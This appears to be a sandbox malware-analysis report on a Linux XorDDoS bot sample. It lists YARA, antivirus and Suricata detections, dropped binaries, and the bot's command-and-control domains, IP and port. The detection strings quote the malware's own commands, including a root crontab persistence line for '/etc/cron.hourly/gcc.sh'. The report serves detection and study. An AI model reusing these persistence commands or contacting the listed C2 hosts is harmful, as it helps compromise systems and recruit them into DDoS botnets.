  • snapd-env-generator (PID: 6273, Parent: 6272, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator
  • cleanup
SourceRuleDescriptionAuthorStrings
UDMp3dZ7nc.elfJoeSecurity_XorDDoSYara detected XorDDoS BotJoe Security
    UDMp3dZ7nc.elfLinux_Trojan_Xorddos_2aef46a6unknownunknown
    • 0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
    UDMp3dZ7nc.elfLinux_Trojan_Xorddos_884cab60unknownunknown
    • 0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
    • 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
    UDMp3dZ7nc.elfMALWARE_Linux_XORDDoSDetects XORDDoSditekSHen
    • 0x84cfb:$s1: for i in `cat /proc/net/dev|grep :|awk -F: {'print $1'}`; do ifconfig $i up& done
    • 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6
    • 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '*/3 * * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab
    • 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
    SourceRuleDescriptionAuthorStrings
    /usr/bin/sosfbbrzmxJoeSecurity_XorDDoSYara detected XorDDoS BotJoe Security
      /usr/bin/sosfbbrzmxLinux_Trojan_Xorddos_2aef46a6unknownunknown
      • 0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
      /usr/bin/sosfbbrzmxLinux_Trojan_Xorddos_884cab60unknownunknown
      • 0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
      • 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
      /usr/bin/sosfbbrzmxMALWARE_Linux_XORDDoSDetects XORDDoSditekSHen
      • 0x84cfb:$s1: for i in `cat /proc/net/dev|grep :|awk -F: {'print $1'}`; do ifconfig $i up& done
      • 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6
      • 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '*/3 * * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab
      • 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
      /usr/bin/uhjkqkcgmaJoeSecurity_XorDDoSYara detected XorDDoS BotJoe Security
        Click to see the 58 entries
        SourceRuleDescriptionAuthorStrings
        6455.1.0000000008048000.00000000080cd000.r-x.sdmpJoeSecurity_XorDDoSYara detected XorDDoS BotJoe Security
          6455.1.0000000008048000.00000000080cd000.r-x.sdmpLinux_Trojan_Xorddos_2aef46a6unknownunknown
          • 0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
          6455.1.0000000008048000.00000000080cd000.r-x.sdmpLinux_Trojan_Xorddos_884cab60unknownunknown
          • 0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
          • 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
          6381.1.0000000008048000.00000000080cd000.r-x.sdmpJoeSecurity_XorDDoSYara detected XorDDoS BotJoe Security
            6455.1.0000000008048000.00000000080cd000.r-x.sdmpMALWARE_Linux_XORDDoSDetects XORDDoSditekSHen
            • 0x84cfb:$s1: for i in `cat /proc/net/dev|grep :|awk -F: {'print $1'}`; do ifconfig $i up& done
            • 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6
            • 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '*/3 * * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab
            • 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
            Click to see the 471 entries
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-03T15:27:53.413618+010020203811Malware Command and Control Activity Detected192.168.2.2355858137.175.90.2131522TCP
            2025-01-03T15:27:53.472788+010020203811Malware Command and Control Activity Detected192.168.2.2355858137.175.90.2131522TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-03T15:27:53.413618+010020213261A Network Trojan was detected192.168.2.23514528.8.8.853UDP
            2025-01-03T15:27:53.421515+010020213261A Network Trojan was detected192.168.2.23390788.8.4.453UDP
            2025-01-03T15:27:53.433409+010020213261A Network Trojan was detected192.168.2.23334051.1.1.153UDP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: UDMp3dZ7nc.elfAvira: detected
            Source: /usr/lib/libudev.soAvira: detection malicious, Label: TR/ELF.DDoS.Xor.b
            Source: /usr/bin/bgoiqqymphAvira: detection malicious, Label: TR/ELF.DDoS.Xor.b
            Source: /usr/bin/dthtwwmqvuAvira: detection malicious, Label: TR/ELF.DDoS.Xor.b
            Source: /usr/bin/eqoogeqydsAvira: detection malicious, Label: TR/ELF.DDoS.Xor.b
            Source: /usr/bin/otlzwyqefcAvira: detection malicious, Label: TR/ELF.DDoS.Xor.b
            Source: /usr/bin/vnihfmehfyAvira: detection malicious, Label: TR/ELF.DDoS.Xor.b
            Source: /usr/bin/ksagqhmoaoAvira: detection malicious, Label: TR/ELF.DDoS.Xor.b
            Source: /usr/bin/oigyzaiygpAvira: detection malicious, Label: TR/ELF.DDoS.Xor.b
            Source: /usr/bin/sosfbbrzmxAvira: detection malicious, Label: TR/ELF.DDoS.Xor.b
            Source: /usr/bin/qxzsiorokfAvira: detection malicious, Label: TR/ELF.DDoS.Xor.b
            Source: /usr/bin/uhjkqkcgmaAvira: detection malicious, Label: TR/ELF.DDoS.Xor.b
            Source: /usr/bin/uzqdvpyngyAvira: detection malicious, Label: TR/ELF.DDoS.Xor.b
            Source: /usr/bin/snluqxjnybAvira: detection malicious, Label: LINUX/Xorddos.misjj
            Source: /usr/bin/gphlkawhxwAvira: detection malicious, Label: TR/ELF.DDoS.Xor.b
            Source: /usr/bin/jeyjdycnpvAvira: detection malicious, Label: TR/ELF.DDoS.Xor.b
            Source: /usr/bin/wutujskjnmAvira: detection malicious, Label: TR/ELF.DDoS.Xor.b
            Source: UDMp3dZ7nc.elfMalware Configuration Extractor: XorDDoS {"C2 list": ["http://aa.hostasa.org/config.rar\u0000tat456.com:1522", "ppp.gggatat456.com:1522"]}
            Source: UDMp3dZ7nc.elfVirustotal: Detection: 65%Perma Link
            Source: UDMp3dZ7nc.elfReversingLabs: Detection: 68%
            Source: /usr/lib/libudev.soJoe Sandbox ML: detected
            Source: /usr/bin/bgoiqqymphJoe Sandbox ML: detected
            Source: /usr/bin/dthtwwmqvuJoe Sandbox ML: detected
            Source: /usr/bin/eqoogeqydsJoe Sandbox ML: detected
            Source: /usr/bin/otlzwyqefcJoe Sandbox ML: detected
            Source: /usr/bin/vnihfmehfyJoe Sandbox ML: detected
            Source: /usr/bin/ksagqhmoaoJoe Sandbox ML: detected
            Source: /usr/bin/oigyzaiygpJoe Sandbox ML: detected
            Source: /usr/bin/sosfbbrzmxJoe Sandbox ML: detected
            Source: /usr/bin/qxzsiorokfJoe Sandbox ML: detected
            Source: /usr/bin/uhjkqkcgmaJoe Sandbox ML: detected
            Source: /usr/bin/uzqdvpyngyJoe Sandbox ML: detected
            Source: /usr/bin/snluqxjnybJoe Sandbox ML: detected
            Source: /usr/bin/gphlkawhxwJoe Sandbox ML: detected
            Source: /usr/bin/jeyjdycnpvJoe Sandbox ML: detected
            Source: /usr/bin/wutujskjnmJoe Sandbox ML: detected
            Source: UDMp3dZ7nc.elfJoe Sandbox ML: detected
            Source: /tmp/UDMp3dZ7nc.elf (PID: 6261)Reads CPU info from proc file: /proc/cpuinfoJump to behavior

            Networking

            barindex
            Source: Network trafficSuricata IDS: 2021326 - Severity 1 - ET MALWARE Likely Linux/Xorddos.F DDoS Attack Participation (aa.hostasa.org) : 192.168.2.23:39078 -> 8.8.4.4:53
            Source: Network trafficSuricata IDS: 2021326 - Severity 1 - ET MALWARE Likely Linux/Xorddos.F DDoS Attack Participation (aa.hostasa.org) : 192.168.2.23:33405 -> 1.1.1.1:53
            Source: Network trafficSuricata IDS: 2021326 - Severity 1 - ET MALWARE Likely Linux/Xorddos.F DDoS Attack Participation (aa.hostasa.org) : 192.168.2.23:51452 -> 8.8.8.8:53
            Source: Network trafficSuricata IDS: 2020381 - Severity 1 - ET MALWARE DDoS.XOR Checkin : 192.168.2.23:55858 -> 137.175.90.213:1522
            Source: global trafficTCP traffic: 192.168.2.23:55858 -> 137.175.90.213:1522
            Source: global trafficTCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443
            Source: global trafficTCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443
            Source: global trafficTCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80
            Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
            Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
            Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
            Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
            Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
            Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
            Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
            Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficDNS traffic detected: DNS query: aa.hostasa.org
            Source: global trafficDNS traffic detected: DNS query: ppp.gggatat456.com
            Source: UDMp3dZ7nc.elf, 6260.1.00000000ff80b000.00000000ff82c000.rw-.sdmp, UDMp3dZ7nc.elf, 6262.1.00000000ff80b000.00000000ff82c000.rw-.sdmp, UDMp3dZ7nc.elf, 6263.1.00000000ff80b000.00000000ff82c000.rw-.sdmp, UDMp3dZ7nc.elf, 6264.1.00000000ff80b000.00000000ff82c000.rw-.sdmp, UDMp3dZ7nc.elf, 6293.1.00000000ff80b000.00000000ff82c000.rw-.sdmp, UDMp3dZ7nc.elf, 6296.1.00000000ff80b000.00000000ff82c000.rw-.sdmp, UDMp3dZ7nc.elf, 6298.1.00000000ff80b000.00000000ff82c000.rw-.sdmp, UDMp3dZ7nc.elf, 6301.1.00000000ff80b000.00000000ff82c000.rw-.sdmp, UDMp3dZ7nc.elf, 6303.1.00000000ff80b000.00000000ff82c000.rw-.sdmp, UDMp3dZ7nc.elf, 6311.1.00000000ff80b000.00000000ff82c000.rw-.sdmp, UDMp3dZ7nc.elf, 6314.1.00000000ff80b000.00000000ff82c000.rw-.sdmp, UDMp3dZ7nc.elf, 6316.1.00000000ff80b000.00000000ff82c000.rw-.sdmp, UDMp3dZ7nc.elf, 6319.1.00000000ff80b000.00000000ff82c000.rw-.sdmp, UDMp3dZ7nc.elf, 6322.1.00000000ff80b000.00000000ff82c000.rw-.sdmp, UDMp3dZ7nc.elf, 6328.1.00000000ff80b000.00000000ff82c000.rw-.sdmp, UDMp3dZ7nc.elf, 6331.1.00000000ff80b000.00000000ff82c000.rw-.sdmp, UDMp3dZ7nc.elf, 6333.1.00000000ff80b000.00000000ff82c000.rw-.sdmp, UDMp3dZ7nc.elf, 6335.1.00000000ff80b000.00000000ff82c000.rw-.sdmp, UDMp3dZ7nc.elf, 6338.1.00000000ff80b000.00000000ff82c000.rw-.sdmp, UDMp3dZ7nc.elf, 6364.1.00000000ff80b000.00000000ff82c000.rw-.sdmp, UDMp3dZ7nc.elf, 6367.1.00000000ff80b000.00000000ff82c000.rw-.sdmpString found in binary or memory: http://aa.hostasa.org/config.rar
            Source: UDMp3dZ7nc.elf, 6260.1.00000000ff80b000.00000000ff82c000.rw-.sdmp, UDMp3dZ7nc.elf, 6262.1.00000000ff80b000.00000000ff82c000.rw-.sdmp, UDMp3dZ7nc.elf, 6263.1.00000000ff80b000.00000000ff82c000.rw-.sdmp, UDMp3dZ7nc.elf, 6264.1.00000000ff80b000.00000000ff82c000.rw-.sdmp, UDMp3dZ7nc.elf, 6293.1.00000000ff80b000.00000000ff82c000.rw-.sdmp, UDMp3dZ7nc.elf, 6296.1.00000000ff80b000.00000000ff82c000.rw-.sdmp, UDMp3dZ7nc.elf, 6298.1.00000000ff80b000.00000000ff82c000.rw-.sdmp, UDMp3dZ7nc.elf, 6301.1.00000000ff80b000.00000000ff82c000.rw-.sdmp, UDMp3dZ7nc.elf, 6303.1.00000000ff80b000.00000000ff82c000.rw-.sdmp, UDMp3dZ7nc.elf, 6311.1.00000000ff80b000.00000000ff82c000.rw-.sdmp, UDMp3dZ7nc.elf, 6314.1.00000000ff80b000.00000000ff82c000.rw-.sdmp, UDMp3dZ7nc.elf, 6316.1.00000000ff80b000.00000000ff82c000.rw-.sdmp, UDMp3dZ7nc.elf, 6319.1.00000000ff80b000.00000000ff82c000.rw-.sdmp, UDMp3dZ7nc.elf, 6322.1.00000000ff80b000.00000000ff82c000.rw-.sdmp, UDMp3dZ7nc.elf, 6328.1.00000000ff80b000.00000000ff82c000.rw-.sdmp, UDMp3dZ7nc.elf, 6331.1.00000000ff80b000.00000000ff82c000.rw-.sdmp, UDMp3dZ7nc.elf, 6333.1.00000000ff80b000.00000000ff82c000.rw-.sdmp, UDMp3dZ7nc.elf, 6335.1.00000000ff80b000.00000000ff82c000.rw-.sdmp, UDMp3dZ7nc.elf, 6338.1.00000000ff80b000.00000000ff82c000.rw-.sdmp, UDMp3dZ7nc.elf, 6364.1.00000000ff80b000.00000000ff82c000.rw-.sdmp, UDMp3dZ7nc.elf, 6367.1.00000000ff80b000.00000000ff82c000.rw-.sdmpString found in binary or memory: http://aa.hostasa.org/config.rartat456.com:1522
            Source: UDMp3dZ7nc.elf, libudev.so.13.dr, bgoiqqymph.13.dr, dthtwwmqvu.13.dr, eqoogeqyds.13.dr, otlzwyqefc.13.dr, vnihfmehfy.13.dr, ksagqhmoao.13.dr, oigyzaiygp.13.dr, sosfbbrzmx.13.dr, qxzsiorokf.13.dr, uhjkqkcgma.13.dr, uzqdvpyngy.13.dr, gphlkawhxw.13.dr, jeyjdycnpv.13.dr, wutujskjnm.13.drString found in binary or memory: http://www.gnu.org/software/libc/bugs.html
            Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 443

            DDoS

            barindex
            Source: Yara matchFile source: UDMp3dZ7nc.elf, type: SAMPLE
            Source: Yara matchFile source: 6455.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6381.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6262.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6296.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6375.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6260.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6552.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6303.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6400.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6372.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6482.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6513.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6516.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6408.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6474.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6298.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6525.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6457.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6391.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6369.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6333.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6331.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6496.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6422.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6498.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6510.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6338.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6367.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6364.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6440.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6301.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6410.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6322.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6417.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6576.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6388.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6491.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6263.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6579.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6508.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6530.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6533.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6403.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6420.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6319.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6562.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6479.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6394.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6593.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6428.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6488.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6536.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6493.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6460.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6311.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6335.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6316.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6435.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6567.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6584.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6386.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6545.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6559.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6564.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6264.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6446.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6549.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6581.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6425.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6528.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6314.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6570.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6471.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6505.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6443.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6405.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6598.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6587.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6438.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6547.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6463.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6328.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6542.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6452.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6596.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6293.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 6476.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: UDMp3dZ7nc.elf PID: 6260, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: UDMp3dZ7nc.elf PID: 6262, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: UDMp3dZ7nc.elf PID: 6263, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: UDMp3dZ7nc.elf PID: 6264, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: UDMp3dZ7nc.elf PID: 6293, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: UDMp3dZ7nc.elf PID: 6296, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: UDMp3dZ7nc.elf PID: 6298, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: UDMp3dZ7nc.elf PID: 6301, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: UDMp3dZ7nc.elf PID: 6303, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: UDMp3dZ7nc.elf PID: 6311, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: UDMp3dZ7nc.elf PID: 6314, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: UDMp3dZ7nc.elf PID: 6316, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: UDMp3dZ7nc.elf PID: 6319, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: UDMp3dZ7nc.elf PID: 6322, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: UDMp3dZ7nc.elf PID: 6328, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: UDMp3dZ7nc.elf PID: 6331, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: UDMp3dZ7nc.elf PID: 6333, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: UDMp3dZ7nc.elf PID: 6335, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: UDMp3dZ7nc.elf PID: 6338, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: UDMp3dZ7nc.elf PID: 6364, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: UDMp3dZ7nc.elf PID: 6367, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: UDMp3dZ7nc.elf PID: 6369, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: UDMp3dZ7nc.elf PID: 6372, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: UDMp3dZ7nc.elf PID: 6375, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: UDMp3dZ7nc.elf PID: 6381, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: UDMp3dZ7nc.elf PID: 6386, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: UDMp3dZ7nc.elf PID: 6388, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: UDMp3dZ7nc.elf PID: 6391, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: UDMp3dZ7nc.elf PID: 6394, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: UDMp3dZ7nc.elf PID: 6400, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: UDMp3dZ7nc.elf PID: 6403, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: UDMp3dZ7nc.elf PID: 6405, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: UDMp3dZ7nc.elf PID: 6408, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: UDMp3dZ7nc.elf PID: 6410, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: UDMp3dZ7nc.elf PID: 6417, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: UDMp3dZ7nc.elf PID: 6420, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: UDMp3dZ7nc.elf PID: 6422, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: UDMp3dZ7nc.elf PID: 6425, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: UDMp3dZ7nc.elf PID: 6428, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: UDMp3dZ7nc.elf PID: 6435, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: UDMp3dZ7nc.elf PID: 6438, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: UDMp3dZ7nc.elf PID: 6440, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: UDMp3dZ7nc.elf PID: 6443, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: UDMp3dZ7nc.elf PID: 6446, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: UDMp3dZ7nc.elf PID: 6452, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: UDMp3dZ7nc.elf PID: 6455, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: UDMp3dZ7nc.elf PID: 6457, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: UDMp3dZ7nc.elf PID: 6460, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: UDMp3dZ7nc.elf PID: 6463, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: UDMp3dZ7nc.elf PID: 6471, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: UDMp3dZ7nc.elf PID: 6474, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: UDMp3dZ7nc.elf PID: 6476, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: UDMp3dZ7nc.elf PID: 6479, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: UDMp3dZ7nc.elf PID: 6482, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: UDMp3dZ7nc.elf PID: 6488, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: UDMp3dZ7nc.elf PID: 6491, type: MEMORYSTR
